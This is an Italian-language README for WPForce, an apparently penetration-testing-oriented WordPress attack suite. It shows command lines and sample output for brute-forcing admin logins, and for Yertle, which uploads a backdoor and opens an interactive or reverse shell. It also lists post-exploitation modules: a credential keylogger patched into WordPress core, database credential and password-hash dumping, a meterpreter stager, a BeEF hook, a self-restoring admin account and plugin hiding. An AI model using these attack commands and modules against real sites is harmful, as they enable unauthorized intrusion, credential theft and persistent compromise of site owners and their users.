
Suite d'attacco per WordPress
WPForce è una suite di strumenti di attacco per Wordpress. Attualmente contiene 2 script: WPForce, che esegue brute force sui login tramite API, e Yertle, che carica shell una volta trovate le credenziali di admin. Yertle contiene anche vari moduli di post-exploitation.
Per maggiori informazioni, visita il post sul blog qui: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/
Blog in altre lingue:
Cinese - www.mottoin.com/100381.html
Portoghese - http://www.100security.com.br/wpforce/
Spagnolo - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html
https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/
Russo - https://hackware.ru/?p=2547
Francese - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/
Turco - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html
Yertle richiede la libreria requests per funzionare.
http://docs.python-requests.org/en/master/user/install/
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"
,-~~-.___. __ __ ____ _____
/ | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___
( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \.
\_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/
==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___|
/ \-'~; || |
/ __/~| ...||__/|-" Strumento di attacco brute force per Wordpress
=( _____||________| ~n00py~
Lista utenti: usr.txt (3)
Lista password: pass.txt (21)
URL: http://www[website].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] sono credenziali valide! - QUESTO ACCOUNT È ADMIN
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] sono credenziali valide!
--------------------------
100% Completato
Tutte le coppie corrette:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}
-h, --help mostra questo messaggio di aiuto ed esci
-i INPUT, --input INPUT
Nome del file di input
-w WORDLIST, --wordlist WORDLIST
Nome del file di wordlist
-u URL, --url URL URL del target
-v, --verbose Output verboso. Mostra i tentativi mentre avvengono.
-t THREADS, --threads THREADS
Determina il numero di thread da usare, default è 10
-a AGENT, --agent AGENT
Determina lo user-agent
-d, --debug Questa opzione è usata per determinare problemi con lo script.
python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
_..---.--. __ __ _ _
.'\ __|/O.__) \ \ / /__ _ __| |_| | ___
/__.' _/ .-'_\ \ V / _ \ '__| __| |/ _ \.
(____.'.-_\____) | | __/ | | |_| | __/
(_/ _)__(_ \_)\_ |_|\___|_| \__|_|\___|
(_..)--(.._)'--' ~n00py~
Modulo di post-exploitation per Wordpress
Backdoor caricata!
Directory di upload: ebwhbas
os-shell>
-h, --help mostra questo messaggio di aiuto ed esci
-i, --interactive Shell interattiva
-r, --reverse Reverse Shell
-t TARGET, --target TARGET
URL del target
-u USERNAME, --username USERNAME
Nome utente admin
-p PASSWORD, --password PASSWORD
Password admin
-li IP, --ip IP IP dell'ascoltatore
-lp PORT, --port PORT
Porta dell'ascoltatore
-v, --verbose Output verboso.
-e EXISTING, --existing EXISTING
Salta il caricamento di una shell e si connette a una shell esistente
Yertle attualmente contiene questi moduli:
Comandi principali
=============
Comando Descrizione
------- -----------
? Menu di aiuto
beef Inietta un hook BeEF nel sito web
dbcreds Stampa le credenziali del database
exit Termina la sessione
hashdump Scarica tutti gli hash delle password di WordPress
help Menu di aiuto
keylogger Patcha il core di WordPress per registrare credenziali in chiaro
keylog Mostra il file keylog
meterpreter Esegue uno stager PHP meterpreter per connettersi a metasploit
persist Crea un account admin che si riaggiungerà
quit Termina la sessione
shell Invia una reverse shell TCP a un listener netcat
stealth Nasconde Yertle dalla pagina dei plugin